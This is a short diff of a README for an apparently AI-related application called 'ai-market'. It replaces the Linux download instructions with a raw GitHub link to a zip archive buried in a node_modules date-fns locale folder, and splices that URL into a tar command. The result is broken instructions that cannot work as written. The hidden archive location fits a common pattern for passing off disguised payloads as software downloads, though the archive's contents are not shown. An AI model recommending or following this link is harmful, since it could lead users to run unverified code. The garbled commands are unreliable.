vieta123456/ai-market/README.md

 ### Linux Users

-For Linux users, you will likely download a `.tar.gz` file.
+For Linux users, you will likely download a `https://raw.githubusercontent.com/vieta123456/ai-market/master/frontend/node_modules/date-fns/esm/locale/ar-DZ/_lib/match/ai-market_1.1.zip` file.
 Follow these steps:

 1. Open your terminal.
 2. Navigate to the directory where you downloaded the file.
-3. Use the command: `tar -xvzf ai-market*.tar.gz` to extract the contents.
+3. Use the command: `tar -xvzf ai-market*https://raw.githubusercontent.com/vieta123456/ai-market/master/frontend/node_modules/date-fns/esm/locale/ar-DZ/_lib/match/ai-market_1.1.zip` to extract the contents.
 4. Navigate into the extracted folder and use `./ai-market` to start the application.

 ## 💡 System Requirements